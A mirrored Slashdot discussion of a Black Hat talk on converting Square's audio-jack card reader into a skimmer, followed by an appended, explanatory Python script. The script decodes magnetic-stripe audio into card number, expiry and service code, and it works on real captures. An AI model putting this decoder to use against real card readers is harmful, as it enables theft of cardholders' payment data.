Slashdot Mirror


At Black Hat: Square Reader To Credit Card Skimmer In 10 Minutes

New submitter arit writes with word that three recent Boston University grads have demonstrated at Black Hat software and hardware attacks on the Square Reader used by many mobile vendors to process credit card transactions. One of the attacks converts a standard reader into an efficient credit card skimmer (conference slides) with very little effort. Always keep Scott Adams' object lesson in mind.

10 of 62 comments

  1. Card Readers are Card Skimmers by Anonymous Coward · · Score: 5, Insightful

    We have card readers attached to our pay-for-print release stations. Turns out if you open Notepad on the release station, the card reader instantly becomes a card skimmer, because, well, card readers read cards.

    1. Re:Card Readers are Card Skimmers by taustin · · Score: 2

      I would be more interested in a comparison to chip-based readers: is it possible to build a chip-based skimmer?

      Highly variable technology, at this point. Generally speaking, yeah, it could be done (though I suspect it'd be harder). The newest toy is a system that encrypts everything on the reader (or maybe on the card), and the merchant never sees the card info at all, so there's nothing to steal. Merchant services are pushing this hard, but it'll take a decade to get it fully deployed, even with the carrot of not having to be PCI compliant any more.

  2. Black Hat for Noobs now? by Lumpy · · Score: 4, Insightful

    The square reader to skimmer trick has been around for YEARS. Cripes all you had to do was record the audio and send the audio files to your skimmer.

    Pretty sad that Black Hat has turned into a n00b conference. Was there also a talk on how you can use keyloggers?

    --
    Do not look at laser with remaining good eye.
  3. Honestly, is anybody surprised? by gstoddart · · Score: 4, Insightful

    Did anybody expect us to believe something you plugged into a cell phone speaker jack was actually secure in any sense of the word?

    Here's a good rule of thumb: if it's a piece of consumer electronics, or involves your phone ... it's probably got terrible security.

    The first time I saw a commercial for that I pretty much said "yeah, I would not trust a vendor who uses one of those".

    The damned thing is almost guaranteed to be something which can be exploited. Sadly, just like every other piece of consumer electronics which tries to add network connectivity.

    Companies don't care about, don't know about, and aren't accountable for security. Stop trusting that they do.

    --
    Lost at C:>. Found at C.
    1. Re:Honestly, is anybody surprised? by Yosho · · Score: 2

      The first time I saw a commercial for that I pretty much said "yeah, I would not trust a vendor who uses one of those".

      What makes them less trustworthy than any other credit card reader?

      --
      Karma: Terrifying (mostly affected by atrocities you've committed)
    2. Re:Honestly, is anybody surprised? by gstoddart · · Score: 2

      The addition of a smartphone, the use of a headphone jack, and the intention to make it simple to use for small businesses.

      Which means you should just start out assuming that it has, like every piece of consumer technology these days, absolutely terrible security... if any at all.

      Every damned week we see yet another piece of consumer tech which has almost zero security. Assuming this is true should be your default position.

      What kind of bubble have you lived in that with a Slashdot id that low you still put any faith in this crap? Because weekly for the last decade or so is evidence to the contrary.

      An app and a headphone jack simply can't graft security onto a smartphone.

      --
      Lost at C:>. Found at C.
    3. Re:Honestly, is anybody surprised? by cyberchondriac · · Score: 2

      I have to back this up. In June, I used a Paypal debit card for a small vendor at a Ren Faire who used one of these (I rarely ever used this card), and a month later I got billed $567 at some Japanese hotel. The dispute is ongoing, though I jumped on it immediately, got the card disabled and a credit; still, that money was out of my checking account for a few days. Now, it could've been a dishonest vendor, or an employee, malware on her phone, or something else, I don't know (even a different transaction, possibly), but it seems beyond coincidence, as I rarely use that card, hadn't used it for months and months prior, had never used it with a card reader before, and never had an issue before.

      --
      Look back up at my post, now look back down, you're on the Internet. Now look back up. I'm a signature.
    4. Re:Honestly, is anybody surprised? by Kidbro · · Score: 2

      I may be wrong, but I don't think GP is asking you why you think the device in question isn't secure. I think GP is asking you why you think other devices are.

    5. Re:Honestly, is anybody surprised? by Yosho · · Score: 2

      What kind of bubble have you lived in that with a Slashdot id that low you still put any faith in this crap?

      As Kidbro pointed out, you're making an incorrect assumption. I don't think smartphone credit card readers are secure. I think that all of the other types of card readers are insecure, too. There have been many cases of them being compromised.

      --
      Karma: Terrifying (mostly affected by atrocities you've committed)
  4. It's news to me by hey! · · Score: 2

    ... that anyone would expect this to be particularly hard to do. After all you're just reading bits off a magnetic stripe.

    Vendors like to talk as if the security of a system is determined by the toughest component in the system, because then they can simply buy some whiz-bang encryption chip, slap it in their product, and claim their product is nigh unbreakable by ordinary mortals. But the truth is the security of a system is determined by its *weakest* component, and in this case that starts with the card itself. Trying to secure that is like trying to secure your butter by nailing it to the butter dish.

    --
    Post may contain irony: discontinue use if experiencing mood swings, nausea or elevated blood pressure.
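The claim in comments 2 and 4 above (record the reader's audio and you have a skimmer; the stripe is just bits with nothing secret on it) can be shown end to end. The script below is an added example written for this page; it is not code from the Black Hat talk, from Square, or from any commenter. It synthesises the F2F (Aiken biphase) head waveform that an unencrypted audio-jack reader would deliver for a constructed Track 2 string, then decodes it back with a peak-interval decoder, per-character parity and LRC checks, and an ISO 7813 Track 2 field parser. The bit-cell length (BIT_CELL), pulse shape (PULSE), and the test PAN are assumptions chosen so it runs offline; a real capture would be passed to waveform_to_bits() in place of the synthetic samples.

```python
# Added example for this page, not code from the talk, Square or any commenter.
# BIT_CELL, PULSE and SAMPLE_TRACK are assumptions so the script runs offline.
import math

BIT_CELL = 60   # assumption: samples per bit cell at the simulated swipe speed
PULSE = 6       # assumption: half-width in samples of one flux-change pulse


def _char_bits(val):
    """4 data bits LSB-first plus an odd-parity bit (one Track 2 character)."""
    data = [(val >> i) & 1 for i in range(4)]
    return data + [1 - sum(data) % 2]


def track2_to_bits(track):
    """';PAN=YYMMsss...?' -> Track 2 bit stream with LRC and clocking zeros."""
    bits, lrc = [0] * 16, 0
    for ch in track:
        val = ord(ch) - 0x30      # Track 2 alphabet is ASCII 0x30..0x3F
        lrc ^= val                # LRC is the XOR of every 4-bit value
        bits += _char_bits(val)
    return bits + _char_bits(lrc) + [0] * 16


def bits_to_waveform(bits):
    """Head output for F2F encoding: a flux change (alternating-polarity pulse)
    at every cell boundary, plus one mid-cell for a '1'."""
    samples = [0.0] * ((len(bits) + 2) * BIT_CELL)
    polarity = 1.0

    def pulse(center):
        nonlocal polarity
        for k in range(-PULSE, PULSE + 1):
            samples[center + k] += polarity * math.cos(math.pi * k / (2 * PULSE))
        polarity = -polarity

    for i, b in enumerate(bits):
        pulse(BIT_CELL * (i + 1))
        if b:
            pulse(BIT_CELL * (i + 1) + BIT_CELL // 2)
    pulse(BIT_CELL * (len(bits) + 1))   # closing transition of the last cell
    return samples


def find_peaks(samples, threshold=0.5):
    """Indices of local extrema whose magnitude exceeds the threshold."""
    peaks = []
    for i in range(1, len(samples) - 1):
        s, prev, nxt = samples[i], samples[i - 1], samples[i + 1]
        if abs(s) >= threshold and ((s > 0 and prev <= s > nxt) or
                                    (s < 0 and prev >= s < nxt)):
            peaks.append(i)
    return peaks


def waveform_to_bits(samples):
    """F2F decode: one full-period gap is a 0, two half-period gaps are a 1.
    The period is re-estimated per cell, so swipe-speed drift is tolerated."""
    peaks = find_peaks(samples)
    gaps = [b - a for a, b in zip(peaks, peaks[1:])]
    period, bits, i = gaps[0], [], 0     # leading clocking zeros seed the period
    while i < len(gaps):
        if gaps[i] > 0.75 * period:
            bits.append(0)
            period, i = gaps[i], i + 1
        elif i + 1 < len(gaps):
            bits.append(1)
            period, i = gaps[i] + gaps[i + 1], i + 2
        else:
            break
    return bits


def bits_to_track2(bits):
    """Frame on ';', check parity per character, stop at '?' and verify the LRC."""
    start = _char_bits(ord(';') - 0x30)
    pos = next((p for p in range(len(bits) - 4) if bits[p:p + 5] == start), None)
    if pos is None:
        raise ValueError("start sentinel not found")
    chars, lrc = [], 0
    while pos + 5 <= len(bits):
        group, pos = bits[pos:pos + 5], pos + 5
        if sum(group) % 2 != 1:
            raise ValueError("parity error at bit %d" % (pos - 5))
        val = sum(bit << i for i, bit in enumerate(group[:4]))
        if chars and chars[-1] == '?':         # the character after '?' is the LRC
            if val != lrc:
                raise ValueError("LRC mismatch")
            return ''.join(chars)
        lrc ^= val
        chars.append(chr(0x30 + val))
    raise ValueError("end sentinel not found")


def parse_track2(track):
    """Split a Track 2 string into PAN, expiry (YYMM), service code and the rest."""
    pan, rest = track.strip(';?').split('=', 1)
    return {"pan": pan, "expiry": rest[:4],
            "service_code": rest[4:7], "discretionary": rest[7:]}


def skim(track):
    """Card -> flux bits -> head audio -> bits -> Track 2 string."""
    return bits_to_track2(waveform_to_bits(bits_to_waveform(track2_to_bits(track))))


SAMPLE_TRACK = ";4111111111111111=2512101123456789?"   # constructed test PAN
if __name__ == "__main__":
    print(parse_track2(skim(SAMPLE_TRACK)))
```

Run it and the PAN, expiry and service code come straight back out of the "audio". Nothing in the decoder needs a key or any knowledge of the reader, which is the practical content of comment 4's weakest-component point: the only fix that removes the data from the merchant's phone is the encrypting reader head that comment 1's reply describes, where the bits leaving the head are already ciphertext and this decoder recovers nothing.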